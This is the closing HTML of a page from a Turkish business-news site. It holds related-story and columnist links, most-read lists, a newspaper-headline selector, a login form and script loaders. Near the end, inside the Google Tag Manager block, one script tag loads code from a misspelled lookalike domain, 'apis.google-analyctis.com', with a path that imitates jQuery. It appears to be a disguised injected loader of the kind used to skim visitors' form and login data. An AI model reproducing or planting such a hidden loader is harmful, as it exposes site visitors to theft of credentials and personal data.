                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bkm_acikladi_2016_da_tuketici_tasarrufa_yoneldi_luks_tuketimi_azaltti_h6095_559cb.png" alt="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”" />
                    <p>BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/seramiksanin-tercihi-volt-motor-oldu-h6087.html" title="Seramiksan&#039;ın tercihi Volt Motor oldu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/seramiksanin_tercihi_volt_motor_oldu_h6087_5a7b0.png" alt="Seramiksan’ın tercihi Volt Motor oldu" />
                    <p>Seramiksan’ın tercihi Volt Motor oldu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/casecampus-genc-girisimcileri-bekliyor-h6096.html" title="CaseCampus genç girişimcileri bekliyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/casecampus_genc_girisimcileri_bekliyor_h6096_a65f7.png" alt="CaseCampus genç girişimcileri bekliyor" />
                    <p>CaseCampus genç girişimcileri bekliyor</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/ziraat-bankasi-surdurulebilir-uretimin-finansmaninda-iddiali-h6101.html" title="Ziraat Bankası, sürdürülebilir üretimin finansmanında iddialı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ziraat_bankasi_surdurulebilir_uretimin_finansmaninda_iddiali_h6101_153d8.png" alt="Ziraat Bankası, sürdürülebilir üretimin finansmanında iddialı" />
                    <p>Ziraat Bankası, sürdürülebilir üretimin finansmanında iddialı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/bp-enerji-gorunumu-2017-raporu-aciklandi-h6097.html" title="&#039;BP Enerji Görünümü 2017” raporu açıklandı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bp_enerji_gorunumu_2017_raporu_aciklandi_h6097_1f286.png" alt="“BP Enerji Görünümü 2017” raporu açıklandı" />
                    <p>“BP Enerji Görünümü 2017” raporu açıklandı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/telkoderin-baskani-yusuf-ata-ariak-guven-tazeledi-h5951.html" title="TELKODER&#039;in Başkanı Yusuf Ata Arıak güven tazeledi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/telkoderin_baskani_yusuf_ata_ariak_guven_tazeledi_h5951_cc2ef.png" alt="TELKODER’in Başkanı Yusuf Ata Arıak güven tazeledi" />
                    <p>TELKODER’in Başkanı Yusuf Ata Arıak güven tazeledi</p>
                  </a>
                  
                                                    </div>
              </div>
            </div>                                                <!-- YAZARLAR -->
            <div id="syazar">
              <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar.html" title="Yazarlar">Yazarlar</a></h5>
                                <a class="control left" href="#" id="syprev"></a>
                <a class="control right" href="#" id="synext"></a>
                              </div>
              <div class="content">
                <div class="item">

                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/turkiye-ekonomisinin-buyume-kapasitesi-makale,365.html" title="Yalçın Sönmez  (EDİTÖR)" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yalcin_sonmez_editor.jpg" alt="Yalçın Sönmez  (EDİTÖR)" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/turkiye-ekonomisinin-buyume-kapasitesi-makale,365.html" title="Yalçın Sönmez  (EDİTÖR)" >Yalçın Sönmez  (EDİTÖR)</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/turkiye-ekonomisinin-buyume-kapasitesi-makale,365.html" title="Türkiye ekonomisinin büyüme kapasitesi" >Türkiye ekonomisinin büyüme kapasitesi</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/dogu-ve-guneydoguda-cazibe-merkezleri-makale,364.html" title="Hilmi Develi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/hilmi_develi_1_1.jpg" alt="Hilmi Develi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/dogu-ve-guneydoguda-cazibe-merkezleri-makale,364.html" title="Hilmi Develi" >Hilmi Develi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/dogu-ve-guneydoguda-cazibe-merkezleri-makale,364.html" title="Doğu ve Güneydoğu&#039;da Cazibe Merkezleri…" >Doğu ve Güneydoğu’da Cazibe Merkezleri…</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/inovasyon-sektorun-belirleyicisi-olacak-makale,363.html" title="Buket Eminoğlu Pilavcı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/buket_eminoglu_pilavci.jpg" alt="Buket Eminoğlu Pilavcı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/inovasyon-sektorun-belirleyicisi-olacak-makale,363.html" title="Buket Eminoğlu Pilavcı" >Buket Eminoğlu Pilavcı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/inovasyon-sektorun-belirleyicisi-olacak-makale,363.html" title="İnovasyon sektörün belirleyicisi olacak" >İnovasyon sektörün belirleyicisi olacak</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/ihracat-kuresel-bir-savastir-makale,362.html" title="Haluk Ünaldı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/haluk-unaldi-yazar.jpg" alt="Haluk Ünaldı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/ihracat-kuresel-bir-savastir-makale,362.html" title="Haluk Ünaldı" >Haluk Ünaldı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/ihracat-kuresel-bir-savastir-makale,362.html" title="İhracat, Küresel Bir Savaştır!" >İhracat, Küresel Bir Savaştır!</a></p>
                    </div>
                  </div>
                                  </div>
                <div class="item">                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/her-sey-zihinde-baslar-makale,361.html" title="Turgay Biçer" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/turgay_bicer_1.jpg" alt="Turgay Biçer" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/her-sey-zihinde-baslar-makale,361.html" title="Turgay Biçer" >Turgay Biçer</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/her-sey-zihinde-baslar-makale,361.html" title="Her Şey Zihinde Başlar…" >Her Şey Zihinde Başlar…</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/yalnizligin-bireysel-ve-toplumsal-boyutlari-makale,360.html" title="Gülsemin Güloğlu" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/gulsemin_guloglu_1.jpg" alt="Gülsemin Güloğlu" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/yalnizligin-bireysel-ve-toplumsal-boyutlari-makale,360.html" title="Gülsemin Güloğlu" >Gülsemin Güloğlu</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/yalnizligin-bireysel-ve-toplumsal-boyutlari-makale,360.html" title="Yalnızlığın Bireysel ve Toplumsal Boyutları" >Yalnızlığın Bireysel ve Toplumsal Boyutları</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/2016-kobi-istihdam-piyasasinda-genel-tablo-nasil-seyretti-makale,359.html" title="Yusuf Azoz" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yusuf-azoz-son.jpg" alt="Yusuf Azoz" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/2016-kobi-istihdam-piyasasinda-genel-tablo-nasil-seyretti-makale,359.html" title="Yusuf Azoz" >Yusuf Azoz</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/2016-kobi-istihdam-piyasasinda-genel-tablo-nasil-seyretti-makale,359.html" title="2016 KOBİ İstihdam Piyasasında Genel Tablo Nasıl Seyretti?" >2016 KOBİ İstihdam Piyasasında Genel Tablo Nasıl Seyretti?</a></p>
                    </div>
                  </div>
                                                </div>
            </div>
            <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar-alinti.html" title="Konuk Yazarlar Arşivi">Konuk Yazarlar Arşivi</a></h5>
           <!--     <a class="control left" href="#" id="ayprev"></a>
                <a class="control right" href="#" id="aynext"></a> -->
              </div>
            </div>
                                                

                      <!-- ENCOKLAR  -->
            <div class="encoklar">
              <div class="accordion">
                              <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
                    <h5><i class="halflings-icon white fire"></i> En Çok Okunan Haberler</h5></a>
                  </div>
                  <div id="collapseOne" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/2017de-ekonomik-yukselise-yeni-bir-kaldirac-gumruk-birligi-reformu-h6006.html" title="2017&#039;de ekonomik yükselişe yeni bir ‘kaldıraç&#039;; GÜMRÜK BİRLİĞİ REFORMU" ><!--b>1.</b--> 2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/dogu-kalkinmasi-icin-start-verildi-cazibe-merkezleri-h6007.html" title="Doğu kalkınması için start verildi; Cazibe Merkezleri" ><!--b>2.</b--> Doğu kalkınması için start verildi; Cazibe Merkezleri</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/bursada-kobilere-ve-girisimcilere-finansal-cozumler-h6009.html" title="Bursa&#039;da KOBİ&#039;lere ve girişimcilere finansal çözümler" ><!--b>3.</b--> Bursa’da KOBİ’lere ve girişimcilere finansal çözümler</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ayin-konugu/mugla-valisi-amir-cicekin-kent-ozetlemesiturizm-ve-yatirim-cenneti-h6008.html" title="Muğla Valisi Amir Çiçek&#039;in kent özetlemesi:Turizm ve yatırım cenneti" ><!--b>4.</b--> Muğla Valisi Amir Çiçek’in kent özetlemesi:Turizm ve yatırım cenneti</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/osb-tanitim/ikitelli-organize-sanayi-bolgesi-yonetim-kurulu-baskan-vekili-saban-gulbahar-h6010.html" title="İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar" ><!--b>5.</b--> İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/musiad-baskani-nail-olpak-musiad-antitez-degil-tezdir-h6012.html" title="MÜSİAD Başkanı Nail Olpak: MÜSİAD antitez değil, tezdir" ><!--b>6.</b--> MÜSİAD Başkanı Nail Olpak: MÜSİAD antitez değil, tezdir</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/torba-yasa-ve-khklarla-gelen-ekonomi-h6011.html" title="Torba Yasa ve KHK&#039;larla gelen ekonomi" ><!--b>7.</b--> Torba Yasa ve KHK’larla gelen ekonomi</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ekonomist/tusiad-basekonomisti-dr-zumrut-imamoglu-h6013.html" title="TÜSİAD Başekonomisti Dr. Zümrüt İmamoğlu:" ><!--b>8.</b--> TÜSİAD Başekonomisti Dr. Zümrüt İmamoğlu:</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/otomasyon/otomasyon-ve-endustri-40-h6022.html" title="Otomasyon ve Endüstri 4.0" ><!--b>9.</b--> Otomasyon ve Endüstri 4.0</a></li>
                                                <li class="last"><a href="http://www.kobi-efor.com.tr/finans/is-faktoring-talebi-gordu-yuzde-50-buyudu-h6015.html" title="İş Faktoring talebi gördü yüzde 50 büyüdü" ><!--b>10.</b--> İş Faktoring talebi gördü yüzde 50 büyüdü</a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                                            <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
                      <h5><i class="halflings-icon white comments"></i> En Çok Yorumlanan Haberler</h5></a>
                  </div>
                  <div id="collapseTwo" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                  <li class="last"><a href="http://www.kobi-efor.com.tr/-h.html" title="" ><!--b>1.</b--> </a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                            </div>
            </div>
            
                                          <!-- newspaper -->
                   <div class="newspaper">
                        <div class="header">
                          <h5>Gazete Manşetleri</h5>
                        </div>
                        <div class="content">
          		    <select name="gazete" onChange="gazete_goster(this.value)" style="width:280px">
          			<option value="">-- Gazete Seçiniz --</option>
          				          					<option value="hurriyet_2017-02-07">Hürriyet</option>
          				          					<option value="milliyet_2017-02-07">Milliyet</option>
          				          					<option value="sabah_2017-02-07">Sabah</option>
          				          					<option value="posta_2017-02-07">Posta</option>
          				          					<option value="vatan_2017-02-07">Vatan</option>
          				          					<option value="zaman_2017-02-07">Zaman</option>
          				          					<option value="cumhuriyet_2017-02-07">Cumhuriyet</option>
          				          					<option value="taraf_2017-02-07">Taraf</option>
          				          					<option value="haberturk_2017-02-07">Haber Türk</option>
          				          					<option value="yeni-safak_2017-02-07">Yeni Şafak</option>
          				          					<option value="star_2017-02-07">Star</option>
          				          					<option value="aksam_2017-02-07">Akşam</option>
          				          					<option value="turkiye_2017-02-07">Türkiye</option>
          				          					<option value="bugun_2017-02-07">Bugün</option>
          				          					<option value="takvim_2017-02-07">Takvim</option>
          				          					<option value="gunluk-evrensel_2017-02-07">Evrensel</option>
          				          					<option value="aydinlik_2017-02-07">Aydınlık</option>
          				          					<option value="milli-gazete_2017-02-07">Milli Gazete</option>
          				          					<option value="ortadogu_2017-02-07">Ortadoğu</option>
          				          					<option value="gunes_2017-02-07">Güneş</option>
          				          					<option value="sozcu_2017-02-07">Sözcü</option>
          				          					<option value="yurt_2017-02-07">Yurt</option>
          				          					<option value="yeni-akit_2017-02-07">Yeni Akit</option>
          				          					<option value="yeniasya_2017-02-07">Yeni Asya</option>
          				          					<option value="milat_2017-02-07">Milat</option>
          				          					<option value="fanatik_2017-02-07">Fanatik</option>
          				          					<option value="fotomac_2017-02-07">Foto Maç</option>
          				          					<option value="dunya_2017-02-07">Dünya</option>
          				          		    </select>
                        </div>
                      </div>
                  <!-- newspaper -->
          	                                    <!--
                                                                                                <!-- REKLAM-58  -->
            <div class="reklam"><div class="fb-page" data-href="https://www.facebook.com/kobiefor" data-width="300" data-height="600" data-small-header="true" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/kobiefor"><a href="https://www.facebook.com/kobiefor">KobiEfor Dergisi</a></blockquote></div></div></div>
                        
	                <!-- SON YORUMLAR -->
            <div class="sayfalar">
              <div class="header">
                <h5>Son Yorumlar</h5>
              </div>
              <div class="content">
                <ul class="unstyled">
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/lojistik/proje-tasimaciligi-h3125.html#comment_97" title="" >Merhabalar haber kaynağı ile ilgili kaynakça...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/yasam/insan-kaynaklari/metro-kurumsal-iletisim-muduru-bilge-ceylan-h3616.html#comment_94" title="" >Bilge hanim - saygilar, adim NAMIK Ayvalik...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/haber/turkiye-mukemmellik-odul-toreni-17-18-kasimda-istanbulda-h4667.html#comment_92" title="" >Mersin Büyükşehir Belediyesi çalışanları...</a></li>
                                    <li><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimiz-kuzey-afrikada-kolay-tutunur-cezayir-tunus-fas-h5441.html#comment_90" title="" >27 şubat - 02 mart 2017 50. fia international...</a></li>
                                    <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.kobi-efor.com.tr/kultur-sanat-moda/nacardan-sportif-tasarimlar-h4243.html#comment_89" title="" >Çok güzel benim kocam kullanıyor</a></li>
                                  </ul>
              </div>
            </div>
            

                                                                                                    </div>
              </div>
            </div>
                      </div>
        </div>
      </div>
      <div class="footer">
        <div class="container center">
          <!-- FOOTER -->
<div id="linkler" class="row-fluid">
  </div>
		<!--div class="btn-group dropup">
  			<button class="btn">Hızlı Menü</button>
  			<button class="btn dropdown-toggle" data-toggle="dropdown">
    			<span class="caret"></span>
  			</button>
			<ul class="dropdown-menu">
        		<li><a href="#"><i class="icon-file"></i> Künye</a></li>
				<li class="divider"></li>
        		<li><a href="#"><i class="icon-plus"></i> Sitene Ekle</a></li>
        		<li><a href="#"><i class="icon-thumbs-up"></i> Reklam Ver</a></li>
        		<li><a href="#"><i class="icon-envelope"></i> İletişim Formu</a></li>
    		</ul>
		</div-->
    <hr>
  <div id="footer-alt" class="row-fluid">
  <div class="span2">
    <a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_altbolge.png" alt="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”" /></a>
  </div>
  <div class="span10">
    <ul class="unstyled">
      <li><a href="http://www.kobi-efor.com.tr/kunye.html"><i class="halflings-icon link"></i> Künye</a></li>
      <li><a href="http://www.kobi-efor.com.tr/anketler.html"><i class="halflings-icon check"></i> Anketler</a></li>
      <li><a href="http://www.kobi-efor.com.tr/roportajlar.html"><i class="halflings-icon tags"></i> Röportajlar</a></li>
      <li><a href="http://www.kobi-efor.com.tr/astroloji"><i class="halflings-icon globe"></i> Astroloji</a></li>
      <li><a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon usd"></i> Reklam Ver</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon envelope"></i> İletişim Formu</a></li>
    </ul>
        <p>&copy; 2017 - Sitemizde yayınlanan haberlerin telif hakları haber kaynaklarına aittir. İzin alınmadan kopyalanamaz.</p>
        <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p>
  </div>
  </div>
<!-- FOOTER ***************************************************** -->        </div>
        <div id="top" class="btn btn-inverse">Yukarı Çık</div>
      </div>
      <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.kobi-efor.com.tr/index.php?m=login" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.kobi-efor.com.tr/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.kobi-efor.com.tr/sifremi-unuttum.html" class="pull-left btn">Şifremi Unuttum</a>
    <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>



   
  <div class="reklam dikey sol" > 
                                                  </div>
    <div class="reklam dikey sag ortala">
                                                                                                                                                                                      </div>



	
                    


<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/login.js"></script>
<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.9.1.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cookie.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.mousewheel.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.scrollbar.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cycle.lite.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/base.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/hs.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/waypoints.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/sticky.min.js',
						,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/comments.js'									,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/system.js',

		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
																

				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}


			});
			


   			hs.graphicsDir = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/hs/';
   			
			$.getJSON(site_url + 'cache/static/twitter_followers.json',function(data) { 
				$('a#followers').html(data);
			});

			var graph_url = 'https://graph.facebook.com/'+facebook_user;
			$.getJSON(graph_url, function(data) {
			  $('a#likes').html(data.likes);
			});


			

			$('.sticky-menu').waypoint('sticky', {
				wrapper: '<div class="sticky-wrapper" />',
				stuckClass: 'stuck'
			});

							$('body').append($("<div class='popup hiding' id='article-finished'></div>"));
				$("#article-finished").html("").append($("#ilgilihaberler2"));


				$('.footer').waypoint(function(direction) {
				  $('#article-finished').toggleClass('hiding', direction === "up");
				}, {
				  offset: function() {
				    return $.waypoints('viewportHeight') - $(this).height() + 500;
				  }
				});
			

			


			



			




			


			
			
						

   
		 }  




	});

</script>


    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W3SBKW"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W3SBKW');</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<!-- End Google Tag Manager -->    


           


    <div id="fb-root"></div>
        <script type="text/javascript">
      var fbTitle  = encodeURIComponent("BKM açıkladı: &#039;2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”");
      var fbUrl    = encodeURIComponent(location.href);
      var fbThumb  = "http://www.kobi-efor.com.tr/images/haberler/thumbs/bkm_acikladi_2016_da_tuketici_tasarrufa_yoneldi_luks_tuketimi_azaltti_h6095_559cb.png";
      var fbDesc   = encodeURIComponent("Bankalararası Kart Merkezi (BKM), Türkiye&#039;de kartlı ödemeler ve nakitsiz toplum hedefine yönelik çalışmalar konusunda 2016 yılında yaşanan gelişmeleri, yapılan basın toplantısında değerlendirdi.");
    </script> 
    
<div id="ilgilihaberler2">
          <p><a href="http://www.kobi-efor.com.tr/reel-sektor/arcelik-turkiye-genel-muduru-can-dincer-oldu-h6103.html" title="Arçelik Türkiye Genel Müdürü Can Dinçer oldu"><b>Arçelik Türkiye Genel Müdürü Can Dinçer...</b>
      <br>Ev teknolojilerinde Türkiye’nin lider, dünyanın önde gelen şirketlerinden biri olan Arçelik A.Ş.’nin...</a></p>
      <p><a href="http://www.kobi-efor.com.tr/reel-sektor/arcelik-turkiye-genel-muduru-can-dincer-oldu-h6103.html" title="Arçelik Türkiye Genel Müdürü Can Dinçer oldu" class="btn btn-danger btn-small">Haberi Oku</a></p>
    </div>


  </body>
</html>
